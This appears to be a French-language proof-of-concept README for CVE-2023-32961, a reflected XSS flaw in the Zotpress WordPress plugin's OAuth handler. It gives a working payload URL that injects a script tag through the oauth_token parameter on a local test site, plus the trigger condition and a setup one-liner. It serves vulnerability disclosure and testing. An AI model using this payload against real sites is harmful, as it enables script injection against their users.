
PoC de CVE-2023-32961
Ce référentiel concerne une vulnérabilité XSS dans le plugin Wordpress Zotpress.
Zotpress
≤ 7.3.3
zotpress
https://wordpress.org/plugins/zotpress/
Non authentifié
La fonction get_request_token dans zotpress/lib/admin/admin.accounts.oauth.php est vulnérable à une attaque XSS.
get_request_token s'exécute. (première fois uniquement)
Envoyez une charge utile comme celle-ci : http://localhost:8080/wp-content/plugins/zotpress/lib/admin/admin.accounts.oauth.php?return_uri=http://localhost:8080&oauth_token=1http://localhost:8080/wp-content/plugins/zotpress/lib/admin/admin.accounts.oauth.php?return_uri=http://localhost:8080&oauth_token="><script>alert(1)</script>Vous avez besoin d'un compte zotero.org.
Vous devez définir la valeur de oauthState sur 1 pour la déclencher. Si la charge utile ci-dessus ne fonctionne pas, vous devez trouver un moyen de définir oauthState sur 1.
expression conditionnelle :
$_GET['oauth_token'] != $state['request_token_info']['oauth_token']
Installation facile de l'extension PHP oauth :
Commande en une ligne :
sudo su; apt-get update; apt-get -y install gcc make autoconf libc-dev pkg-config libpcre3-dev; pecl install oauth; bash -c "echo extension=oauth.so > $PHP_INI_DIR/conf.d/oauth.ini"; service apache2 restart
Testé avec l'image Docker wordpress:latest.